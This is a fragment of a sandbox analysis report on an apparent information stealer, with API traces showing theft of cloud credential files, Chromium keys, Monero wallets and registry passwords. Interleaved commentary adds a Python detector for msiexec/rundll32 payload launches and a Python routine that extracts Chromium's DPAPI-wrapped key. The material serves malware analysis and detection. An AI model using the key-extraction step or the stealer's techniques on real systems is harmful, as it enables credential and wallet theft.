                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 341bd849c2252bd3168ec2866b035f3c2d951d037c605eb74d14fe9481118dd0
                                    • Instruction ID: cc51c6f4bc602323d61748b462f5fbd2824cd2c143891d0a83036a2fb2d48f34
                                    • Opcode Fuzzy Hash: 341bd849c2252bd3168ec2866b035f3c2d951d037c605eb74d14fe9481118dd0
                                    • Instruction Fuzzy Hash: 18418479A40208AAD710F760EC47FED3738AB64701F4048947349661C3EEB557C98B92
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000E906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 7029c37f1c78dc3947a9656316a9d0fa19058dd9c04f53a13b26c4bad290164a
                                    • Instruction ID: 936781756f3e77d15ef015a2648e1d359292cbf766efd9f0aeae2966dbab59a8
                                    • Opcode Fuzzy Hash: 7029c37f1c78dc3947a9656316a9d0fa19058dd9c04f53a13b26c4bad290164a
                                    • Instruction Fuzzy Hash: 9D71E9B1A10608AFDB14DFE4DC89FEEBBB9BB4C301F108508F615A7295DB34A905CB61
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E31C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E34EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 6e853a065cc53bdaf4278f5d78f8761d2d3e0138147884c08bd2bdb60f0bdb5e
                                    • Instruction ID: 7f04d6ba5b1feed1b68e60e8f72d6f5cbf2963675beecc7c5208e04e5e709205
                                    • Opcode Fuzzy Hash: 6e853a065cc53bdaf4278f5d78f8761d2d3e0138147884c08bd2bdb60f0bdb5e
                                    • Instruction Fuzzy Hash: 0B120C719001489EDB19EBA1DD92FEEB738AF19300F514169E50676193EF343B4ACFA2
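The string constants of this function ("/i ", " /passive", ".msi", ".dll", the full paths of msiexec.exe and rundll32.exe) together with the three ShellExecuteEx calls describe how a fetched payload is handed to a signed system binary: an .msi goes to msiexec.exe with /i and /passive, a .dll goes to rundll32.exe. As an added detection example (not code from the report or from the sample), the Python below scans constructed process-creation events for those two command-line shapes and only flags them when the payload path lies in a user-writable directory; the directory list and the sample events are assumptions for the example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed for this example)."""
    parent_image: str
    image: str
    command_line: str


# Command-line shapes built from the string constants in the listing:
#   msiexec.exe /i <file>.msi /passive      and      rundll32.exe <file>.dll
MSIEXEC_RE = re.compile(
    r'(?:^|\\)msiexec\.exe"?\s+/i\s+"?(?P<path>[^"]+?\.msi)"?\s+/passive\b', re.I)
RUNDLL32_RE = re.compile(
    r'(?:^|\\)rundll32\.exe"?\s+"?(?P<path>[^",]+?\.dll)"?', re.I)

# Staging directories a dropped payload is typically executed from. This list
# is an assumption for the example, not a location taken from the report.
USER_WRITABLE_RE = re.compile(
    r'\\(?:Temp|AppData|ProgramData|Downloads|Public)\\', re.I)


def classify(ev: ProcEvent):
    """Return (rule_name, payload_path) when the event matches, else None."""
    for rule, rx in (("msiexec_passive_install", MSIEXEC_RE),
                     ("rundll32_dll_load", RUNDLL32_RE)):
        m = rx.search(ev.command_line)
        if m and USER_WRITABLE_RE.search(m.group("path")):
            return rule, m.group("path")
    return None


def scan(events):
    """Run classify() over a batch; return (parent, image, rule, path) per hit."""
    hits = []
    for ev in events:
        hit = classify(ev)
        if hit:
            hits.append((ev.parent_image, ev.image) + hit)
    return hits


# Constructed sample events: two loader-style launches and two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\file.exe",
              r"C:\Windows\System32\msiexec.exe",
              r'C:\Windows\system32\msiexec.exe /i "C:\Users\alice\AppData\Local\Temp\upd.msi" /passive'),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\file.exe",
              r"C:\Windows\System32\rundll32.exe",
              r'C:\Windows\system32\rundll32.exe "C:\Users\Public\x.dll"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Program Files\Vendor\setup.msi" /quiet'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\rundll32.exe",
              r'C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL'),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The path check is what keeps the rule useful: msiexec /i … /passive and rundll32 <dll> are everyday administrative commands, so the signal is the combination of that shape with a payload staged under a temp, profile or public directory. In a real pipeline the parent image (here an unsigned executable in Temp) is the second field to pivot on.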
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D6280: InternetOpenA.WININET(000F0DFE,00000001,00000000,00000000,00000000), ref: 000D62E1
                                      • Part of subcall function 000D6280: StrCmpCA.SHLWAPI(?,00B81328), ref: 000D6303
                                      • Part of subcall function 000D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6335
                                      • Part of subcall function 000D6280: HttpOpenRequestA.WININET(00000000,GET,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D6385
                                      • Part of subcall function 000D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D63BF
                                      • Part of subcall function 000D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D63D1
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5318
                                    • lstrlen.KERNEL32(00000000), ref: 000E532F
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 000E5364
                                    • lstrlen.KERNEL32(00000000), ref: 000E5383
                                    • lstrlen.KERNEL32(00000000), ref: 000E53AE
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 12a1224ff1e1da56410d0fc36910ba0479a6f557ed157eb73467ea8874a2d109
                                    • Instruction ID: 7813e7fcac679ad002ee449689380a575c4603f963950619d4471fc66f76409a
                                    • Opcode Fuzzy Hash: 12a1224ff1e1da56410d0fc36910ba0479a6f557ed157eb73467ea8874a2d109
                                    • Instruction Fuzzy Hash: 17512B30A10188EFDB14EF61CD92AED3779AF19305F514428E5067A593EF347B4ACB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 8f350d5048e6b44c49027152e4ccc7cf584fdd261994c2a0dadaa5d212c110c7
                                    • Instruction ID: 35bdf7a0f085b2a7a0bd9ee98e84bd48cc7fac5da100b796922553ebddd6a515
                                    • Opcode Fuzzy Hash: 8f350d5048e6b44c49027152e4ccc7cf584fdd261994c2a0dadaa5d212c110c7
                                    • Instruction Fuzzy Hash: CBC193B5A0125D9FCB14EF61DD89FEE7378BB58304F004598E50AB7242DB70AA85CF91
                                    APIs
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E42EC
                                    • lstrcat.KERNEL32(?,00B808E8), ref: 000E430B
                                    • lstrcat.KERNEL32(?,?), ref: 000E431F
                                    • lstrcat.KERNEL32(?,00B7F028), ref: 000E4333
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000E8D90: GetFileAttributesA.KERNEL32(00000000,?,000D1B54,?,?,000F564C,?,?,000F0E1F), ref: 000E8D9F
                                      • Part of subcall function 000D9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000D9D39
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                      • Part of subcall function 000E93C0: GlobalAlloc.KERNEL32(00000000,000E43DD,000E43DD), ref: 000E93D3
                                    • StrStrA.SHLWAPI(?,00B80A68), ref: 000E43F3
                                    • GlobalFree.KERNEL32(?), ref: 000E4512
                                      • Part of subcall function 000D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9AEF
                                      • Part of subcall function 000D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000D4EEE,00000000,?), ref: 000D9B01
                                      • Part of subcall function 000D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9B2A
                                      • Part of subcall function 000D9AC0: LocalFree.KERNEL32(?,?,?,?,000D4EEE,00000000,?), ref: 000D9B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E44A3
                                    • StrCmpCA.SHLWAPI(?,000F08D1), ref: 000E44C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000E44D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 000E44E5
                                    • lstrcat.KERNEL32(00000000,000F0FB8), ref: 000E44F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 8fb06d4481921b4fd4760d01a71ed884ff98b5d725124e3c5922ed3cd731ebcf
                                    • Instruction ID: 1e13e19820e7a36cd2beac22b787b3890f0967085b409de62c86603a9713cf53
                                    • Opcode Fuzzy Hash: 8fb06d4481921b4fd4760d01a71ed884ff98b5d725124e3c5922ed3cd731ebcf
                                    • Instruction Fuzzy Hash: 9C7147B6D00618ABDB14EBE0DC85FEE777DAB8C301F048598F605A7182DA34DB45CBA1
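The subcalls of this function show the browser master-key lookup: SHGetFolderPathA resolves the profile directory, the file is read with CreateFileA/ReadFile, StrStrA searches for the literal `"encrypted_key":"`, and the value is decoded with CryptStringToBinaryA using flag 1 (CRYPT_STRING_BASE64). The Python below is an added example, not code from the report or the sample, that reproduces that parse on a constructed Chromium "Local State" document and validates what comes out. The "DPAPI" prefix Chromium puts in front of the key and the DPAPI blob header (dwVersion 1, provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb) are documented Windows/Chromium behaviour, not values taken from this report; the sample blob is constructed and cannot be decrypted.

```python
import base64
import json
import struct
import uuid

# Chromium stores its AES key in Local State as base64 of the literal prefix
# "DPAPI" followed by a DPAPI blob. Prefix and blob header are known
# Chromium/Windows layout, not values taken from the sandbox report.
KEY_PREFIX = b"DPAPI"
DPAPI_VERSION = 1
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
MARKER = '"encrypted_key":"'  # the exact substring the function searches for


def extract_encrypted_key(local_state_text: str) -> bytes:
    """Find the marker by substring search (as StrStrA does, so it also works on
    truncated or non-JSON input) and base64-decode the value that follows it
    (CryptStringToBinaryA with CRYPT_STRING_BASE64 == 1)."""
    start = local_state_text.find(MARKER)
    if start < 0:
        raise ValueError("encrypted_key not present")
    start += len(MARKER)
    end = local_state_text.find('"', start)
    if end < 0:
        raise ValueError("unterminated encrypted_key value")
    return base64.b64decode(local_state_text[start:end])


def is_dpapi_wrapped(decoded: bytes) -> bool:
    """True when the decoded key carries the DPAPI prefix and a well-formed
    blob header (dwVersion == 1, fixed provider GUID)."""
    if not decoded.startswith(KEY_PREFIX) or len(decoded) < len(KEY_PREFIX) + 20:
        return False
    blob = decoded[len(KEY_PREFIX):]
    version, = struct.unpack_from("<I", blob, 0)
    return version == DPAPI_VERSION and uuid.UUID(bytes_le=blob[4:20]) == DPAPI_PROVIDER


def dpapi_blob_from_key(decoded: bytes) -> bytes:
    """Strip the prefix and return the raw DPAPI blob, i.e. the buffer that
    CryptUnprotectData in the victim's user context would unwrap."""
    if not is_dpapi_wrapped(decoded):
        raise ValueError("encrypted_key is not a DPAPI-wrapped key")
    return decoded[len(KEY_PREFIX):]


def build_sample_local_state(blob: bytes) -> str:
    """Constructed Local State content containing only the field that matters."""
    value = base64.b64encode(KEY_PREFIX + blob).decode()
    return json.dumps({"os_crypt": {"encrypted_key": value}}, separators=(",", ":"))


# Constructed blob: valid 20-byte header followed by a dummy body.
SAMPLE_BLOB = struct.pack("<I", DPAPI_VERSION) + DPAPI_PROVIDER.bytes_le + b"\x00" * 44

if __name__ == "__main__":
    text = build_sample_local_state(SAMPLE_BLOB)
    key = extract_encrypted_key(text)
    print("DPAPI-wrapped:", is_dpapi_wrapped(key), "blob bytes:", len(dpapi_blob_from_key(key)))
```

Two practical points follow from this. First, the decoded blob is only unwrappable by CryptUnprotectData under the victim's logon session, which is why stealers decrypt on the host rather than exfiltrating Local State; a DPAPI blob found in outbound traffic is a weaker indicator than the read of Local State itself. Second, Chromium builds that use app-bound encryption store the browser-side key under a different field (`app_bound_encrypted_key`) with a different prefix, so this substring parse, like the sample's, covers only the DPAPI-prefixed key.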
                                    APIs
                                      • Part of subcall function 000D12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000D12B4
                                      • Part of subcall function 000D12A0: RtlAllocateHeap.NTDLL(00000000), ref: 000D12BB
                                      • Part of subcall function 000D12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000D12D7
                                      • Part of subcall function 000D12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000D12F5
                                      • Part of subcall function 000D12A0: RegCloseKey.ADVAPI32(?), ref: 000D12FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 000D134F
                                    • lstrlen.KERNEL32(?), ref: 000D135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 000D1377
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 000D1465
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 000D14EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: c1f55363047f6a4d3ee49fd3435e0a708a8c2822c177f3ed41cade7648dd8573
                                    • Instruction ID: 53db6755526fadccfebdf7b2c4b87f0e2fade6986d32acdb7eb5f498a1c80fdf
                                    • Opcode Fuzzy Hash: c1f55363047f6a4d3ee49fd3435e0a708a8c2822c177f3ed41cade7648dd8573
                                    • Instruction Fuzzy Hash: DB5156B1E101585BDB15FB61DD92BED733CAF58300F4045A8B60A72083EF306B89CBA6
                                    APIs
                                      • Part of subcall function 000D72D0: memset.MSVCRT ref: 000D7314
                                      • Part of subcall function 000D72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000D733A
                                      • Part of subcall function 000D72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000D73B1
                                      • Part of subcall function 000D72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000D740D
                                      • Part of subcall function 000D72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 000D7452
                                      • Part of subcall function 000D72D0: HeapFree.KERNEL32(00000000), ref: 000D7459
                                    • lstrcat.KERNEL32(00000000,000F17FC), ref: 000D7606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000D7648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 000D765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000D768F
                                    • lstrcat.KERNEL32(00000000,000F1804), ref: 000D76A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000D76D3
                                    • lstrcat.KERNEL32(00000000,000F1808), ref: 000D76ED
                                    • task.LIBCPMTD ref: 000D76FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
